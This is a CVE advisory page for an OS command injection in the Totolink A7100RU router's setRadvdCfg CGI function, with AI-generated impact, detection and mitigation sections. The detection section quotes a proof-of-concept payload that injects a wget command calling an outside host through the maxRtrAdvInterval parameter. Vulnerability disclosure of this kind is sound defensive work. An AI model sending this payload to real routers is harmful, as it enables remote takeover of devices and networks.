CVE-2026-6112
Received Received - Intake
OS Command Injection in Totolink A7100RU CGI Handler (setRadvdCfg

Publication date: 2026-04-12

Last updated on: 2026-04-12

Assigner: VulDB

Description
A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. Affected is the function setRadvdCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument maxRtrAdvInterval causes os command injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-04-12
Last Modified
2026-04-12
Generated
2026-06-16
AI Q&A
2026-04-12
EPSS Evaluated
2026-06-15
NVD
CVE-2026-6112
EUVD
EUVD-2026-21700
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
totolink a7100ru 7.4cu.2313_b20191024
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-6112 is a command injection vulnerability in the TOTOLINK A7100RU router, version 7.4cu.2313_b20191024. It exists in the CGI Handler component, specifically in the function setRadvdCfg within the /cgi-bin/cstecgi.cgi file. The vulnerability arises because the user-supplied parameter maxRtrAdvInterval is improperly handled and passed to system commands without sufficient validation.

An attacker can send a crafted HTTP POST request containing malicious commands in the maxRtrAdvInterval parameter. This causes the router to execute arbitrary operating system commands remotely, such as downloading files or running other harmful commands. The exploit has been publicly disclosed and demonstrated with a proof of concept.

Impact Analysis

This vulnerability allows remote attackers to execute arbitrary operating system commands on the affected router without any authentication. This can lead to full compromise of the device.

  • Attackers could take control of the router, potentially intercepting or redirecting network traffic.
  • They could install malware or create persistent backdoors.
  • Sensitive information passing through the router could be exposed or manipulated.
  • The overall security and availability of the network could be severely impacted.
Detection Guidance

This vulnerability can be detected by sending a crafted HTTP POST request to the endpoint /cgi-bin/cstecgi.cgi on the affected Totolink A7100RU router. The request should include the parameter maxRtrAdvInterval set to a command that can confirm command execution, such as a wget command to a controlled server.

For example, a proof of concept involves sending a POST request with maxRtrAdvInterval set to `wget 192.168.6.1:7777/testpoc`. If the router executes this command, it confirms the presence of the vulnerability.

Detection commands or steps include using tools like curl or wget to send the crafted POST request with the malicious payload and monitoring for any outbound connections or side effects indicating command execution.

Compliance Impact

The vulnerability allows remote attackers to execute arbitrary operating system commands on the affected TOTOLINK A7100RU router. This could lead to unauthorized access, data breaches, or disruption of services.

Such unauthorized access and potential data compromise can negatively impact compliance with common standards and regulations like GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and breaches.

Therefore, exploitation of this vulnerability could result in violations of these regulations due to failure to adequately secure network devices and protect data confidentiality and integrity.

Mitigation Strategies

To mitigate the CVE-2026-6112 vulnerability in the TOTOLINK A7100RU router, immediate steps include restricting remote access to the affected CGI interface (/cgi-bin/cstecgi.cgi) to trusted networks only.

Additionally, monitor network traffic for suspicious HTTP POST requests containing the maxRtrAdvInterval parameter, which could indicate exploitation attempts.

If possible, disable or restrict the vulnerable function setRadvdCfg or the CGI Handler component until a patch or firmware update is available from the vendor.

Applying any available firmware updates or patches from TOTOLINK addressing this vulnerability should be prioritized once released.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-6112. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart